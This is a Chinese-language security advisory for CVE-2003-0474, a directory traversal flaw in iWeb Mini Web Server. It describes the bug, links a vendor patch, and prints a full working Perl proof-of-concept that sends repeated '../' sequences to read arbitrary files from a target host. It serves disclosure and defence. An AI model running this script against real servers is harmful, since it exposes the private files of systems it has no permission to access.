iWeb Mini Web服务程序远程目录遍历漏洞
发布日期:2003-04-16
更新日期:2003-04-18
受影响系统:iWeb Mini Web Server
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
描述:
CVE(CAN) ID:
CVE-2003-0474
iWeb Mini Web是一款小型HTTP服务程序。
iWeb对用户提交的URI请求缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限查看系统任意文件内容。
问题存在于iWeb不正确过滤'../'字符,攻击者提交包含多个'../'字符的URI请求,可导致绕过webroot目录限制,远程遍历系统目录,查看文件内容。
<*来源:subversive (
subversive@linuxmail.org)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105049794801319&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
subversive (
subversive@linuxmail.org)提供了如下测试方法:
#!/usr/bin/perl -w
#
# S e c u r i t y F r e a k s
# www.securityfreaks.com
#
# iWeb Mini Web Server Remote Directory Traversal
#
# subversive[at]linuxmail.org - *15/04/2003*
use IO::Socket;
if(!$ARGV[0]) {
print <<"IWEBSUK";
S e c u r i t y F r e a k s
www.securityfreaks.com
-------------------------------------------------------------
SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
-------------------------------------------------------------
Usage: $0 <host> <file> <port>
IWEBSUK
exit;
}
else{
$host = $ARGV[0];
}
if(!$ARGV[2]) {
$port = "80";
}
else {
$port = $ARGV[2];
}
my $sock = new IO::Socket::INET ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "\nConnection to $host:$port failed\n" unless $sock;
print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
while(<$sock>) { print }
close($sock);
print("\n\n");
exit;
建议:
厂商补丁:
iWeb
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://ashleybrown.co.uk/downloads/iws2.exe浏览次数:3460
严重程度:0(网友投票)
